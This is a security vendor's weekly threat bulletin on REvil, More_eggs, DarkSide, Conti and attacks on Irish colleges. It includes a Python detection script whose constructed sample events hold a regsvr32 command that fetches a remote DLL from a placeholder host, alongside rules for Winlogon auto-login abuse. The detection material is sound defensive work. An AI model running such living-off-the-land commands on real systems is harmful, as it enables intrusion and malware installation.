Cyberthreat update from Acronis CPOCs: Week of April 12, 2021

Here at Acronis, we’re always monitoring for dangers to your data, deploying updates to handle newly discovered vulnerabilities, and issuing alerts and recommendations to help you stay protected. Our global network of Acronis Cyber Protection Operations Centers (CPOCs) continues to work around the clock to proactively detect and defend against the latest cyberthreats.

Part of this work includes video updates to inform you of modern hazards in the digital landscape — such as new cyberthreat campaigns and ransomware strikes against major organizations. Here’s a look at some of the most recent breaking news and analyses:

New REvil feature guarantees auto-login in Safe Mode

The REvil cyberthreat gang recently added a new feature to their Sodinokibi ransomware, allowing it to perform the encryption process in Safe Mode but requiring a manual reboot. Now, the gang has refined this feature to be more effective.

With this latest update, REvil’s ransomware can now automatically log back into the system after rebooting. The malware changes the logged-on user’s password and makes Registry edits to ensure Windows will sign in automatically using the new information.

Ransomware gangs continue to evolve their attacks, and REvil’s ransom demands consistently make headlines — like their $50 million strike against computing giant Acer last month. Acronis Cyber Protect features an advanced heuristic engine that recognizes and blocks malicious processes before they can impact your systems and data.

More_eggs aimed at job hunters on LinkedIn

A personalized spear-phishing attack campaign from the Golden Chickens cyberthreat group uses personal information mined from LinkedIn to piece together fake job offers. Victims receiving these messages are enticed to open a malicious attachment, which installs the More_eggs backdoor.

The malicious attachment is a .zip archive containing an LNK file. This file abuses Windows Management Instrumentation (WMI) to start a script that uses CMSTP and RegSvr32 to download and register a malicious ActiveX control from Amazon Cloud. Abusing legitimate system tools for malicious purposes is an example of what cyberthreat researchers call “living-off-the-land” tactics.

The More_eggs backdoor, once established, provides the attackers with remote access to the system and can lead to installation of further threats — including banking malware, credential stealers, and ransomware. Acronis Cyber Protect Cloud detects and blocks malicious behaviors, including those characteristic of backdoors, before they can spread inside your organization.
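Both mechanisms described above leave traces in endpoint telemetry: the REvil Safe Mode trick writes the Winlogon auto-login values, and the More_eggs chain launches RegSvr32 or CMSTP from WMI with a remote resource. The detection logic below is an added example, not Acronis or Golden Chickens code; it runs two rules over constructed Sysmon-style records, assumes the standard Winlogon AutoAdminLogon/DefaultPassword value names, and the sample paths and URL are made up.

```python
import re
# Constructed sample telemetry (not from the bulletin), loosely shaped like
# Sysmon registry-value-set (EventID 13) and process-create (EventID 1) records.
WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "TargetObject": WINLOGON + r"\AutoAdminLogon", "Details": "1"},
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "TargetObject": WINLOGON + r"\DefaultPassword", "Details": "(redacted)"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",  # benign: only one value
     "TargetObject": WINLOGON + r"\DefaultUserName", "Details": "bob"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "regsvr32 /s /i:https://bucket.example.invalid/ctl.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",  # benign install
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
]
LOLBINS = {"cmstp.exe", "regsvr32.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect_autologon_setup(events):
    """Rule 1 (REvil Safe Mode trick): one process enables AutoAdminLogon AND writes DefaultPassword."""
    writes = {}  # writer image -> Winlogon value names it set
    for e in events:
        target = e.get("TargetObject", "")
        if e.get("EventID") != 13 or not target.lower().startswith(WINLOGON.lower() + "\\"):
            continue
        name = target.rsplit("\\", 1)[-1]
        if name == "AutoAdminLogon" and e.get("Details") != "1":
            continue  # switching auto-logon off is not the pattern we want
        writes.setdefault(e.get("Image", "?"), set()).add(name)
    return [f"autologon setup by {img}" for img, names in writes.items()
            if {"AutoAdminLogon", "DefaultPassword"} <= names]

def detect_lolbin_download(events):
    """Rule 2 (More_eggs chain): cmstp.exe/regsvr32.exe handed a URL or started by the WMI host."""
    findings = []
    for e in events:
        if e.get("EventID") != 1 or basename(e.get("Image", "")) not in LOLBINS:
            continue
        cmd = e.get("CommandLine", "")
        from_wmi = basename(e.get("ParentImage", "")) == "wmiprvse.exe"
        if from_wmi or re.search(r"https?://", cmd, re.I):
            findings.append(f"lolbin {basename(e['Image'])}: {cmd}")
    return findings
```

Rule 1 deliberately requires both values from the same writer, so an administrator setting only DefaultUserName is not flagged.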

Canadian chain Home Hardware Stores hit by DarkSide ransomware

One of Canada's largest hardware retailers, Home Hardware Stores, is the latest victim of the DarkSide ransomware gang. DarkSide's leak site claims that the group has stolen 300 GB of sensitive data, including financial documents, project details, contracts, and NDAs.

To ratchet up the pressure, DarkSide has created countdown clocks on their website and is leaking data every 24 hours until Home Hardware Stores pays the demanded ransom. The amount of money requested is not publicly known at this time, but previous demands by the group have ranged from $200,000–$2 million.

Home Hardware Stores is an undeniably high-value target. The chain has over 1,050 stores to its name, with an estimated annual revenue of $4.85 billion. The best way for any organization to avoid ransomware negotiations is by detecting cyberthreats before they steal and encrypt data. Acronis Cyber Protect recognizes DarkSide's ransomware and stops it in its tracks.

SEPA ransomware recovery expected to last into 2022

On Christmas Eve of 2020, the Scottish Environment Protection Agency (SEPA) suffered a Conti ransomware attack. The agency has refused to pay the ransom, and has been working with data recovery specialists since December to restore their systems and more than 4,000 stolen files.

As of early April 2021, SEPA has been able to get around 70% of their staff back online, but doesn't expect to have systems and data fully restored until sometime in 2022.

In addition to the toll that system downtime has taken on the agency, the stolen data has been leaked on the dark web. This attack has cost SEPA nearly £800,000 in response and recovery expenses. SEPA is not relying on reclaiming copies of the leaked files, because of the likelihood that those files have been infected.

Ransomware attacks can be incredibly costly, whether or not you pay the demands. The best option is to prevent the attack in the first place. Acronis Cyber Protect Cloud uses behavioral and AI-based detection engines to stop Conti and other ransomware before they can steal your data or encrypt your systems.

Classes halted after two Irish colleges suffer cyberattacks

The National College of Ireland (NCI) and Technological University of Dublin (TU Dublin) have both suffered ransomware attacks, affecting IT systems and preventing normal staff and student activities both on and off campus.

The attack on NCI has affected not only IT systems but also backups, causing additional downtime by preventing standard recovery procedures. The school has blocked access to buildings and systems while it investigates and begins restoration.

TU Dublin was able to stop the attack quickly before it spread between campuses, and early stages of the investigation don’t indicate that any sensitive data has been exfiltrated. However, the attack did cause an ongoing shutdown of systems on the Tallaght campus, and is preventing the IT staff from responding to any IT requests at this time.

In addition to its ransomware protection, the backups included in Acronis Cyber Protect Cloud are protected against tampering. This ensures that they stay safe from ransomware and that, in the event of system compromise or data loss, a quick recovery is possible.

# # #

For the latest reports on emerging cyberthreats from Acronis’ cyber protection experts, subscribe to the Acronis YouTube channel and receive our CPOC updates as they’re posted.
